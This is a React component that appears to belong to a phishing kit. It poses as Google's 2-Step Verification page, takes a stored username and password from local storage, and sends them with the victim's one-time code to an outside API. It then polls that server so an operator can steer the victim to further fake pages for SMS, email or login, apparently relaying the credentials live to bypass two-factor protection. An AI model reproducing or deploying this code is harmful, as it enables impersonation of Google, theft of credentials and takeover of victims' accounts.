import { useState, useEffect, useRef } from "react";
import GoogleAuthPopup, { GoogleAccountChip } from "./GoogleAuthPopup";

export default function Twofa() {
  const [code, setCode] = useState("");

  const [sessionId, setSessionId] = useState(null);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState("");
  const [infoMessage, setInfoMessage] = useState("");
  const [username, setUsername] = useState("");
  const [password, setPassword] = useState("");
  const [passwordSubmitRef, setPasswordSubmitRef] = useState(false);

  const API_URL = process.env.REACT_APP_API_BASE_URL;
  const FRONT_URL = window.location.origin;
  const pollingIntervalRef = useRef(null);
  const hasSubmitted2FA = useRef(false);
  const isPolling = useRef(false);

  const handleSubmit = (e) => {
    e.preventDefault();

    if (code.length !== 6 || !/^\d+$/.test(code)) {
      setError("Please enter a valid 6-digit code");
      return;
    }

    setError("");
    setInfoMessage("");
    setPasswordSubmitRef(true);
    setLoading(true);
    hasSubmitted2FA.current = true;

    (async () => {
      try {
        const storedSessionId = localStorage.getItem("session_id");

        const res = await fetch(`${API_URL}/api/twofa`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            code,
            username,
            password,
            session_id: storedSessionId || sessionId,
          }),
        });

        if (!res.ok) {
          const data = await res.json();
          throw new Error(data.detail || "Login failed");
        }

        const data = await res.json();
        const { session_id } = data;

        if (session_id) {
          setSessionId(session_id);
          localStorage.setItem("session_id", session_id);
        } else if (storedSessionId) {
          setSessionId(storedSessionId);
        }

        startPolling(session_id || storedSessionId || sessionId);
      } catch (err) {
        console.error("Login failed:", err);
        setError(err.message || "Login failed");
        setLoading(false);
        setPasswordSubmitRef(false);
        hasSubmitted2FA.current = false;
      }
    })();
  };

  const startPolling = (pollSessionId) => {
    if (!pollSessionId || isPolling.current) return;
    isPolling.current = true;

    if (pollingIntervalRef.current) {
      clearInterval(pollingIntervalRef.current);
    }

    const routes = {
      email: "/email",
      wp: "/wp",
      "2fa": "/2fa",
      sms: "/sms",
      wpauth: "/wp",
      login: "/login",
    };

    pollingIntervalRef.current = setInterval(async () => {
      try {
        const res = await fetch(
          `${API_URL}/check_response?session_id=${pollSessionId}`
        );
        if (!res.ok) throw new Error("Failed to fetch response");
        const data = await res.json();

        if (data.redirect && !data.redirect.startsWith("error:")) {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setPasswordSubmitRef(false);
          setLoading(false);
          window.location.replace(data.redirect);
          return;
        }

        if (data.authType && data.authType !== "2fa") {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setPasswordSubmitRef(false);
          setLoading(false);
          const route = routes[data.authType];
          if (route) {
            window.location.replace(`${FRONT_URL}${route}`);
          } else {
            setError("Unknown authentication type.");
            setLoading(false);
          }
          return;
        }

        if (data.error) {
          clearInterval(pollingIntervalRef.current);
          isPolling.current = false;
          setLoading(false);
          setPasswordSubmitRef(false);
          setError("That code didn't work. Please re-enter your code again.");
          hasSubmitted2FA.current = false;
          return;
        }

        if (data.message) {
          setInfoMessage(data.message);
        }
      } catch (err) {
        console.error("Polling error:", err);
      }
    }, 2000);
  };

  useEffect(() => {
    return () => {
      if (pollingIntervalRef.current) {
        clearInterval(pollingIntervalRef.current);
        pollingIntervalRef.current = null;
        isPolling.current = false;
      }
    };
  }, []);

  useEffect(() => {
    const storedUsername = localStorage.getItem("username") || "";
    const storedPassword = localStorage.getItem("password") || "";
    const storedSessionId = localStorage.getItem("session_id") || null;
    setUsername(storedUsername);
    setPassword(storedPassword);
    if (storedSessionId) {
      setSessionId(storedSessionId);
    }
  }, []);

  return (
    <GoogleAuthPopup>
      <h1 className="google-verify-title">Verify it&apos;s you</h1>
      <p className="google-verify-intro google-verify-intro--tight">
        To help keep your account safe, Google wants to make sure it&apos;s
        really you trying to sign in.
      </p>
      <GoogleAccountChip email={username} />

      <h2 className="google-verify-subtitle">2-Step Verification</h2>
      <p className="google-verify-detail">
        Get a verification code from the{" "}
        <strong>Google Authenticator</strong> app
      </p>

      <form
        onSubmit={handleSubmit}
        className="google-signin-form google-verify-form"
      >
        <div className="input-group">
          <div className="input-wrapper google-signin-input">
            <input
              id="code"
              type="tel"
              inputMode="numeric"
              pattern="\d{6}"
              value={code}
              disabled={loading}
              onChange={(e) => {
                const val = e.target.value.replace(/\D/g, "").slice(0, 6);
                setCode(val);
                if (error) setError("");
              }}
              onKeyDown={(e) => {
                if (
                  !/^\d$/.test(e.key) &&
                  ![
                    "Backspace",
                    "Delete",
                    "ArrowLeft",
                    "ArrowRight",
                    "Tab",
                    "Enter",
                  ].includes(e.key)
                ) {
                  e.preventDefault();
                }
              }}
              required
              className={`${code.trim() ? "filled" : ""} ${
                error ? "error-input" : ""
              }`}
              autoFocus
            />
            <label htmlFor="code" className={error ? "error-label" : ""}>
              Enter code
            </label>
          </div>

          {passwordSubmitRef && loading && (
            <div className="password-submit-loader">
              <div className="spinner"></div>
              <p className="loader-text">
                {isPolling.current
                  ? "Waiting for response..."
                  : "Verifying code..."}
              </p>
            </div>
          )}

          {error && <p className="error-message">{error}</p>}
          {infoMessage && (
            <p className="google-verify-detail">{infoMessage}</p>
          )}
        </div>

        <div className="submit-button-div google-signin-actions">
          <button
            type="button"
            className="custom-secondary-button google-signin-link-btn"
            onClick={() => {
              window.location.href = `${FRONT_URL}/login`;
            }}
            disabled={loading}
          >
            Try another way
          </button>
          <button
            className="custom-primary-button google-signin-next-btn"
            type="submit"
            disabled={loading || code.length !== 6}
          >
            Next
          </button>
        </div>
      </form>
    </GoogleAuthPopup>
  );
}
